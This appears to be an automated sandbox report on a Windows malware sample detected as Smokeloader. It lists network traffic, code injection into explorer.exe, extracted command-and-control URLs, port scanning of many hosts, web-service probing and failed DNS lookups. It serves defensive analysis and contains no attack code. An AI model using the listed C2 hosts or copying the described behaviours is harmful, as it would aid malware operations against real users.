                Source: unknownHTTPS traffic detected: 54.183.63.241:443 -> 192.168.2.6:65355 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.233.198.20:443 -> 192.168.2.6:65304 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:65427 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:65532 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:65424 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:49387 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.2:443 -> 192.168.2.6:65449 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.195.133.145:443 -> 192.168.2.6:65420 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:65421 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.60.0.44:443 -> 192.168.2.6:49206 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:65454 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:65455 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.22.74.220:443 -> 192.168.2.6:65482 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:49384 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:65422 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 77.240.114.212:443 -> 192.168.2.6:65520 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.4:443 -> 192.168.2.6:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.5.25:443 -> 192.168.2.6:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 186.113.7.204:443 -> 192.168.2.6:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:49691 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.195.133.145:443 -> 192.168.2.6:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.199.96.179:443 -> 192.168.2.6:49679 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:50020 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.249.120.4:443 -> 192.168.2.6:50036 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:49690 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.14.180:443 -> 192.168.2.6:49693 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.4.32.216:443 -> 192.168.2.6:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 177.74.1.157:443 -> 192.168.2.6:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.40.88:443 -> 192.168.2.6:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.43.117:443 -> 192.168.2.6:49765 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.120.71.26:443 -> 192.168.2.6:50054 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 178.16.128.181:443 -> 192.168.2.6:50031 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.69:443 -> 192.168.2.6:50055 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:50072 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.199.96.179:443 -> 192.168.2.6:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.60.0.44:443 -> 192.168.2.6:50122 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.195.133.145:443 -> 192.168.2.6:50147 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.170.147:443 -> 192.168.2.6:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.69:443 -> 192.168.2.6:49689 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 202.81.112.32:443 -> 192.168.2.6:49375 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.41.153:443 -> 192.168.2.6:49696 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.2:443 -> 192.168.2.6:50145 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.66.39.205:443 -> 192.168.2.6:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.255.105.79:443 -> 192.168.2.6:50113 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.78.166.130:443 -> 192.168.2.6:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.128.15:443 -> 192.168.2.6:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.203.148.34:443 -> 192.168.2.6:49949 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.22.74.220:443 -> 192.168.2.6:50102 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.78.166.130:443 -> 192.168.2.6:49775 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 36.255.71.45:443 -> 192.168.2.6:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 41.33.126.100:443 -> 192.168.2.6:50126 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:50058 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 41.33.126.100:443 -> 192.168.2.6:50127 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.218.172:443 -> 192.168.2.6:50114 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:50218 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.136.2:443 -> 192.168.2.6:50104 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 201.134.41.61:443 -> 192.168.2.6:50103 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.4:443 -> 192.168.2.6:50502 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 82.221.28.171:443 -> 192.168.2.6:50132 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:50133 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:50511 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 77.240.114.212:443 -> 192.168.2.6:50390 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:50134 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:50367 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.233.198.20:443 -> 192.168.2.6:50125 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:50460 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.5.25:443 -> 192.168.2.6:50373 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.136.2:443 -> 192.168.2.6:50492 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:50709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.6:50146 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.199.96.179:443 -> 192.168.2.6:50665 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:50354 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:50708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 36.255.71.45:443 -> 192.168.2.6:50236 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 186.113.7.204:443 -> 192.168.2.6:50666 version: TLS 1.2
                Source: Binary string: C:\viweyaxehara hojicikepuxe\vosi\cavadelawi74\gizagol\res.pdb source: S23UhdW5DH.exe, 00000000.00000000.2058707940.0000000000427000.00000002.00000001.01000000.00000003.sdmp, S23UhdW5DH.exe, 00000000.00000002.2135326441.0000000000427000.00000002.00000001.01000000.00000003.sdmp, rghwvve, 00000006.00000000.2330117193.0000000000427000.00000002.00000001.01000000.00000005.sdmp, rghwvve, 00000006.00000002.2410440238.0000000000427000.00000002.00000001.01000000.00000005.sdmp
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,18_2_00464048
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,18_2_004644C4
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00452A4C FindFirstFileA,GetLastError,18_2_00452A4C
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00462ABC FindFirstFileA,FindNextFileA,FindClose,18_2_00462ABC
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004751F8 FindFirstFileA,FindNextFileA,FindClose,18_2_004751F8
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,18_2_00497A74
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.6:49706 -> 91.215.85.120:80
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 172.67.213.22 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 2.180.10.7 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 91.215.85.120 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 185.172.128.19 80Jump to behavior
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://valarioulinity1.net/index.php
                Source: Malware configuration extractorURLs: http://buriatiarutuhuob.net/index.php
                Source: Malware configuration extractorURLs: http://cassiosssionunu.me/index.php
                Connects to many ports of the same IP (likely port scanning)
                Source: global trafficTCP traffic: 185.120.71.24 ports 22,0,443,8,80,21
                Source: global trafficTCP traffic: 177.74.1.30 ports 143,1,3,465,4,995
                Source: global trafficTCP traffic: 104.22.75.220 ports 22,143,2,465,995,21
                Source: global trafficTCP traffic: 78.93.109.21 ports 22,3,443,4,80,21
                Source: global trafficTCP traffic: 3.134.125.175 ports 22,143,1,2,443,465,587,995,80,21
                Source: global trafficTCP traffic: 47.251.24.188 ports 22,222,3,443,4,80,21
                Source: global trafficTCP traffic: 179.191.175.70 ports 22,143,1,2,465,21
                Source: global trafficTCP traffic: 104.26.14.180 ports 22,143,1,3,443,4,80,21
                Source: global trafficTCP traffic: 77.88.21.249 ports 143,1,3,465,4,995
                Source: global trafficTCP traffic: 8.45.52.148 ports 22,143,3,443,465,4,80,21
                Source: global trafficTCP traffic: 177.74.1.157 ports 22,0,443,8,80,21
                Source: global trafficTCP traffic: 13.248.169.48 ports 22,143,990,1,222,3,443,465,4,995,80,21
                Source: global trafficTCP traffic: 173.194.219.26 ports 143,1,3,465,4,995
                Source: global trafficTCP traffic: 138.197.59.199 ports 22,25,143,1,2525,3,443,4,995,80,21
                Source: global trafficTCP traffic: 104.21.60.188 ports 22,990,1,2,222,443,80,21
                Source: global trafficTCP traffic: 47.246.167.169 ports 22,143,3,443,465,4,995,80,21
                Source: global trafficTCP traffic: 54.216.244.65 ports 143,1,3,465,4,995
                Source: global trafficTCP traffic: 184.25.164.103 ports 22,25,143,3,443,3535,4,587,995,80,21
                Source: global trafficTCP traffic: 205.220.166.26 ports 143,110,1,3,465,993,4,587,995
                Source: global trafficTCP traffic: 3.20.137.44 ports 143,1,2,465,995,21
                Source: global trafficTCP traffic: 52.52.207.210 ports 22,143,1,2,465,995,21
                Source: global trafficTCP traffic: 3.14.182.203 ports 22,143,2,465,995,21
                Source: global trafficTCP traffic: 54.205.118.36 ports 22,143,2,465,995,21
                Source: global trafficTCP traffic: 76.223.54.146 ports 22,143,1,2,465,995,21
                Source: global trafficTCP traffic: 200.61.38.87 ports 22,110,3,443,465,4,995,80,21
                Source: global trafficTCP traffic: 34.160.13.42 ports 143,465,587,5,995,9
                Source: global trafficTCP traffic: 31.13.65.7 ports 22,26,143,3,443,4,80,21
                Source: global trafficTCP traffic: 20.231.114.24 ports 22,0,443,993,587,995,8,80,21
                Source: global trafficTCP traffic: 3.163.115.127 ports 22,143,110,2,465,21
                Source: global trafficTCP traffic: 164.100.2.66 ports 143,1,3,465,993,4,995
                Source: global trafficTCP traffic: 179.191.175.66 ports 22,143,1,2,443,465,80,21
                Source: global trafficTCP traffic: 52.21.29.94 ports 22,143,110,465,993,587,5,995,9,21
                Source: global trafficTCP traffic: 64.190.63.111 ports 22,2,443,995,80,21
                Source: global trafficTCP traffic: 103.90.225.70 ports 22,143,3,443,465,993,4,587,80,21
                Source: global trafficTCP traffic: 34.149.46.130 ports 22,143,3,443,465,4,995,80,21
                Source: global trafficTCP traffic: 54.85.194.183 ports 22,0,143,110,443,465,995,8,80,21
                Source: global trafficTCP traffic: 31.13.65.1 ports 22,143,110,2,443,465,995,80,21
                Source: global trafficTCP traffic: 31.13.88.1 ports 22,143,3,443,465,4,995,80,21
                Source: global trafficTCP traffic: 3.134.39.220 ports 22,143,2,465,995,21
                Source: global trafficTCP traffic: 3.22.30.40 ports 22,143,2,465,587,995,21
                Source: global trafficTCP traffic: 195.248.251.103 ports 22,990,222,3,443,4,80,21
                Source: global trafficTCP traffic: 44.194.231.6 ports 22,143,2,465,995,21
                Source: global trafficTCP traffic: 104.21.32.61 ports 22,143,110,1,2525,3,4,995,21
                Source: global trafficTCP traffic: 207.211.30.141 ports 143,110,1,3,465,4,995
                Source: global trafficTCP traffic: 186.28.225.16 ports 22,143,1,2,443,465,995,80,21
                Source: global trafficTCP traffic: 207.211.30.242 ports 143,110,1,3,465,4,995
                Source: global trafficTCP traffic: 205.139.110.221 ports 143,110,465,5,995,9
                Source: global trafficTCP traffic: 35.186.223.180 ports 22,25,143,110,3,443,4,995,80,21
                Source: global trafficTCP traffic: 195.85.23.95 ports 22,143,1,2,443,80,21
                Source: global trafficTCP traffic: 3.163.115.86 ports 22,110,143,1,3,443,465,4,80,21
                Source: global trafficTCP traffic: 104.21.14.245 ports 22,25,143,990,1,222,3,443,4,995,80,21
                Source: global trafficTCP traffic: 41.33.126.100 ports 22,143,110,3,443,465,4,995,80,21
                Source: global trafficTCP traffic: 170.114.52.4 ports 22,25,26,143,990,220,2525,2,222,443,465,993,3535,587,2222,80,21
                Source: global trafficTCP traffic: 190.216.203.136 ports 22,220,3,443,4,80,21
                Source: global trafficTCP traffic: 54.158.51.60 ports 22,143,2,443,465,995,80,21
                Source: global trafficTCP traffic: 170.114.52.2 ports 22,990,222,3,443,4,2222,80,21
                Source: global trafficTCP traffic: 104.21.5.25 ports 22,26,143,110,990,222,3,443,3535,4,995,80,21
                Source: global trafficTCP traffic: 185.51.191.48 ports 22,220,110,990,2,443,465,587,995,80,21
                Source: global trafficTCP traffic: 200.108.110.164 ports 22,220,3,443,465,4,80,21
                Source: global trafficTCP traffic: 3.141.96.53 ports 22,143,990,1,2,443,465,995,80,21
                Source: global trafficTCP traffic: 104.21.34.34 ports 22,222,3,443,4,80,21
                Source: global trafficTCP traffic: 79.110.82.173 ports 22,143,2,443,465,995,80,21
                Source: global trafficTCP traffic: 54.183.63.241 ports 22,143,990,222,3,443,465,4,995,80,21
                Source: global trafficTCP traffic: 173.192.7.98 ports 143,1,3,465,4,995
                Source: global trafficTCP traffic: 52.6.30.70 ports 22,143,2,465,995,21
                Source: global trafficTCP traffic: 207.211.30.221 ports 143,110,1,3,465,4,995
                Source: global trafficTCP traffic: 205.139.110.242 ports 143,110,465,5,995,9
                Source: global trafficTCP traffic: 202.81.112.32 ports 22,143,443,465,4,5,995,6,80,21
                Source: global trafficTCP traffic: 162.241.203.30 ports 22,143,1,2,443,465,993,995,80,21
                Source: global trafficTCP traffic: 77.240.114.212 ports 22,143,990,110,1,2,222,443,465,993,587,995,2222,80,21
                Source: global trafficTCP traffic: 35.172.32.95 ports 26,110,2525,2,5,995
                Source: global trafficTCP traffic: 190.152.216.14 ports 22,25,143,990,3,443,465,993,4,995,80,21
                Source: global trafficTCP traffic: 104.21.39.206 ports 22,220,110,1,2,465,587,995,21
                Source: global trafficTCP traffic: 46.33.178.67 ports 22,143,2,443,465,80,21
                Source: global trafficTCP traffic: 89.30.68.3 ports 22,143,1,2,465,21
                Source: global trafficTCP traffic: 188.212.100.154 ports 22,143,220,2,222,443,465,995,2222,80,21
                Source: global trafficTCP traffic: 104.17.62.50 ports 22,143,990,2,222,443,465,587,995,80,21
                Source: global trafficTCP traffic: 18.200.3.224 ports 22,3,443,4,80,21
                Source: global trafficTCP traffic: 108.177.12.14 ports 25,143,220,1,2525,3,465,993,4,587,995
                Source: global trafficTCP traffic: 82.221.28.171 ports 22,1,2,443,80,21
                Source: global trafficTCP traffic: 103.224.182.210 ports 22,990,1,2,443,995,80,21
                Source: global trafficTCP traffic: 200.88.115.217 ports 22,143,2,465,995,80,21
                Source: global trafficTCP traffic: 104.22.43.158 ports 22,3,443,4,80,21
                Source: global trafficTCP traffic: 190.202.89.204 ports 22,143,1,222,3,443,4,995,2222,80,21
                Source: global trafficTCP traffic: 31.216.144.5 ports 22,990,2,222,443,80,21
                Source: global trafficTCP traffic: 164.100.128.15 ports 22,0,143,443,465,995,8,80,21
                Source: global trafficTCP traffic: 190.202.2.80 ports 0,143,995,8,80,21
                Source: global trafficTCP traffic: 162.159.136.232 ports 22,3,443,4,80,21
                Source: global trafficTCP traffic: 179.51.70.125 ports 22,143,990,2,222,443,465,995,80,21
                Source: global trafficTCP traffic: 3.219.54.242 ports 22,143,1,2,465,995,21
                Source: global trafficTCP traffic: 104.17.63.50 ports 22,143,2,465,995,21
                Source: global trafficTCP traffic: 3.161.136.69 ports 22,26,143,3,443,4,80,21
                Source: global trafficTCP traffic: 54.71.181.160 ports 22,143,990,1,2,222,443,465,995,80,21
                Source: global trafficTCP traffic: 44.195.133.145 ports 22,143,2,465,443,995,80,21
                Source: global trafficTCP traffic: 122.56.56.210 ports 143,1,3,465,993,4,587,995
                Source: global trafficTCP traffic: 23.4.32.216 ports 22,990,222,3,443,4,2222,80,21
                Source: global trafficTCP traffic: 20.192.98.160 ports 22,143,2,443,465,995,80,21
                Source: global trafficTCP traffic: 3.161.136.53 ports 22,26,143,1,2,21
                Source: global trafficTCP traffic: 181.4.228.155 ports 22,143,2,443,465,2222,80,21
                Source: global trafficTCP traffic: 3.161.150.61 ports 22,143,2,465,995,21
                Source: global trafficTCP traffic: 44.233.131.115 ports 22,143,990,1,2,222,443,465,995,80,21
                Source: global trafficTCP traffic: 104.18.32.109 ports 22,143,110,990,1,2,222,443,80,21
                Source: global trafficTCP traffic: 87.233.198.20 ports 22,26,2525,2,443,80,21
                Source: global trafficTCP traffic: 104.255.105.79 ports 22,143,1,2,443,587,80,21
                Source: global trafficTCP traffic: 164.100.2.109 ports 143,465,993,4,5,995,6
                Source: global trafficTCP traffic: 124.237.208.37 ports 22,143,990,2,222,443,465,80,21
                Source: global trafficTCP traffic: 3.161.150.72 ports 22,143,2,465,995,21
                Source: global trafficTCP traffic: 3.161.150.69 ports 22,143,2,465,443,995,80,21
                Source: global trafficTCP traffic: 178.16.128.181 ports 22,143,222,3,443,4,995,80,21
                Source: global trafficTCP traffic: 104.22.74.220 ports 22,143,3,443,465,4,995,80,21
                Source: global trafficTCP traffic: 164.100.2.114 ports 143,465,4,5,995,6
                Source: global trafficTCP traffic: 3.13.191.225 ports 22,143,2,465,995,21
                Source: global trafficTCP traffic: 64.91.249.20 ports 22,0,990,443,8,80,21
                Source: global trafficTCP traffic: 186.113.7.204 ports 22,143,990,110,222,3,443,465,993,4,587,995,80,21
                Source: global trafficTCP traffic: 104.26.8.17 ports 22,3,443,4,80,21
                Source: global trafficTCP traffic: 138.66.39.205 ports 22,143,2,465,443,995,80,21
                Source: global trafficTCP traffic: 103.224.212.34 ports 143,110,1,3,465,4,587,995
                Source: global trafficTCP traffic: 201.134.41.61 ports 22,143,1,3,443,465,4,995,80,21
                Source: global trafficTCP traffic: 142.250.105.84 ports 22,3,443,4,80,21
                Source: global trafficTCP traffic: 13.249.120.86 ports 22,1,2,443,80,21
                Source: global trafficTCP traffic: 104.21.85.95 ports 22,143,1,222,3,443,4,995,80,21
                Source: global trafficTCP traffic: 44.199.96.179 ports 22,143,1,2,465,993,443,587,995,80,21
                Source: global trafficTCP traffic: 104.18.41.153 ports 22,143,465,443,5,995,80,9,21
                Source: global trafficTCP traffic: 3.161.150.89 ports 22,143,3,443,465,4,995,80,21
                Source: global trafficTCP traffic: 45.60.74.50 ports 143,990,1,222,3,465,4,995,2222,80
                Source: global trafficTCP traffic: 45.60.0.44 ports 22,143,1,2,443,465,995,80,21
                Source: global trafficTCP traffic: 3.163.115.11 ports 22,143,110,1,2,465,21
                Source: global trafficTCP traffic: 45.43.208.39 ports 143,110,1,3,465,4,587
                Source: global trafficTCP traffic: 34.208.174.61 ports 22,143,2,465,995,21
                Source: global trafficTCP traffic: 3.161.136.2 ports 22,26,143,2,443,80,21
                Source: global trafficTCP traffic: 185.78.166.130 ports 22,143,110,2,443,465,993,995,80,21
                Source: global trafficTCP traffic: 96.7.224.178 ports 22,110,990,222,3,443,4,80,21
                Source: global trafficTCP traffic: 185.120.71.170 ports 143,110,465,5,995,9
                Source: global trafficTCP traffic: 163.247.44.239 ports 22,25,143,2,443,465,993,995,80,21
                Source: global trafficTCP traffic: 103.94.204.46 ports 22,3,443,4,80,21
                Found Tor onion address
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://milogin.michigan.gov/PhpMyAdmin/eampowered.comd.onion
                Performs DNS queries to domains with low reputation
                Source: DNS query: followerstiktok.xyz
                Source: DNS query: followerstiktok.xyz
                Source: DNS query: followerstiktok.xyz
                Source: DNS query: followerstiktok.xyz
                Source: DNS query: ww16.followerstiktok.xyz
                Probes for web service weaknesses (weak passwords or vulnerabilities)
                Source: httpHTTP: ro.bongacams.com/phpmyadmin
                Source: httpHTTP: ro.bongacams.com/phpmyadmin
                Tries to resolve many domain names, but no domain seems valid
                Source: unknownDNS traffic detected: query: mailgate.brasilliker.net replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: mobile.liga365gacor.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.netcsomagom.dpd.hu replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.auth.cambridgelms.org replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.analvids.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.sport.autoplay.cloud replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.tls21.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.pan.baidu.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.signup2.br.leagueoflegends.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.loopex.io replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.signup.takendelight.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: ftp.signup.takendelight.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: imap.app.jobpet.com.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.account.live.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.casinocontroller.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.milogin.michigan.gov replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.s163-es.ogame.gameforge.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.tls21.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.netcsomagom.dpd.hu replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.steamcommunity.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.v.xsanime.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.auth.cambridgelms.org replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.mobile.liga365gacor.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.servicios.sat.gob.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.signin.rockstargames.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.mobile.liga365gacor.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.app.jobpet.com.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.pan.baidu.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.mobile.liga365gacor.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.srienlinea.sri.gob.ec replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: netcsomagom.dpd.hu replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.analvids.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.loopex.io replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.sport.autoplay.cloud replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.brasilliker.net replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: mail.tls21.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.us04web.zoom.us replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.sii.itzacatepec.edu.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.mitextoescolar.mineduc.cl replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.ventas.officeinsumos.com.ar replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.vidcorn.tv replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: sii.itzacatepec.edu.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.auth.cambridgelms.org replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.srienlinea.sri.gob.ec replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.ssl-es.hoteles.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.midetuvelocidad.claro.com.pe replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.m.sellercenter.lazada.com.my replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.ssl-es.hoteles.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.casinocontroller.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.mitextoescolar.mineduc.cl replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.naukrigulf.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.brasilliker.net replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: imap.netcsomagom.dpd.hu replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.netizion.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.us04web.zoom.us replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.midetuvelocidad.claro.com.pe replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.loopex.io replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.gitam.zoom.us replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.tls21.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.ventas.officeinsumos.com.ar replaycode: Name error (3)
